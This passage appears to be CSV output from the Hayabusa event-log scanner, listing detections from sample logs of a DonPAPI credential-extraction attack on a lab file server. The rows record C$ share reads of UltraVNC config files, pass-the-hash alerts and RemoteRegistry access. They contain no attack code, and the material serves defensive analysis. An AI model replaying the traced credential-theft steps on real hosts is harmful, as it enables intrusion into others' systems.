Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: PROGRAM FILES\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Program Files (x86)\UltraVNC\ultravnc.ini | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.096 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | IP Addr: 10.23.123.11 | LID: 0x8723c99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 
10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724935,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.111 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.127 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724935 | AccessMask: %%1537 %%1538 
%%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.174 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x872496f,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.174 
+09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.189 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x872496f | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
16:16:04.237 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249a8,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.237 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.269 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249a8 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 
0x87249e1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x87249e1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.300 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.333 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x87249e1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 
16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724a17,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.367 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.382 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724a17 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 
16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724ba1,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.461 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.476 
+09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724ba1 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724bd7,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 
0x8724bd7,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.523 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.539 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724bd7 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4672,info,,Admin 
Logon,User: admmig | LID: 0x8724c0d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c0d,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.586 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.601 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c0d | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.648 
+09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724c46,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724c46,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.648 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.664 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724c46 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 %%7192,rules/hayabusa/default/alerts/Security/4674_PossibleHiddenServiceAttempt.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service 
Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1046-Network Service Scanning/ID4624-Anonymous login with domain specified (DonPapi).evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4672,info,,Admin Logon,User: admmig | LID: 0x8724d99,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,5140,info,Collect,Network Share Access,User: admmig | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.23.123.11 | LID: 0x8724d99,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.728 +09:00,fs03vuln.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID5145-4624-DonPAPI full extraction.evtx +2021-12-12 16:16:04.743 +09:00,fs03vuln.offsec.lan,4674,medium,Persis,Possible Hidden Service Attempt,Svc: RemoteRegistry | User: admmig | LID: 0x8724d99 | AccessMask: %%1537 %%1538 %%1539 %%7184 %%7185 %%7186 %%7187 %%7188 %%7189 %%7190 %%7191 
